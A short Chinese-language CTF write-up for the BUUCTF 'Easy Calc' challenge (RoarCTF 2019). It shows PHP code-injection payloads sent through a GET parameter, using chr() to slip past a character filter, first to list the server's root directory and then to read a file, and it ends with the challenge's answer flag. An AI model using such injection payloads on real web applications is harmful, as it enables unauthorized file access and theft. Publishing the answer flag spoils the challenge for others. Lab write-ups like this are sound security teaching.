BUUCTF---[RoarCTF 2019]Easy Calc1

1.题目描述

2.搜索网址是一个计算器,输入正常的运算,可以运算

3.查看源码,发现有一个calc.php

4.访问calc.php,代码提示用get方式传输num参数,但是过滤了\等等。

5.构造play load,发现了一个f1agg.

复制代码
num=print_r(scandir(chr(47)))

chr(47)是"/"的ASCII编码

scandir()是用来扫描文件目录

print_r是将扫描结果打印出来

6.尝试访问f1agg

复制代码
num=print_r(file_get_contents(chr(47).f1agg))

file_get_conctents()用来读取f1agg里面的内容,最后print_r将内容输出

7.

复制代码
flag{de45bb5f-1b75-4b33-99fb-904f876df79f} 
相关推荐
红树林076 分钟前
渗透测试之sql注入--盲注
数据库·sql·安全·web安全
palette73720 分钟前
buuctf 刷题记录
网络安全
XH-hui34 分钟前
【打靶日记】群内靶机 Open
linux·网络安全
世界尽头与你43 分钟前
跨站请求伪造(CSRF)漏洞
web安全·网络安全·渗透测试·csrf
风语者日志1 小时前
CTFSHOW菜狗杯—WEB签到
前端·web安全·ctf·小白入门
雨落秋垣1 小时前
多系统 BBR 加速与网络安全综合方案
安全·web安全
m0_738120721 小时前
渗透测试——Kioptrix5靶机渗透测试详细教程
网络·python·安全·web安全·ssh
2301_764441332 小时前
python构建的基于WiFi重连流量分析的隐蔽摄像头检测
网络协议·网络安全·信息与通信
XH-hui2 小时前
【打靶日记】群内靶机 Word
linux·网络安全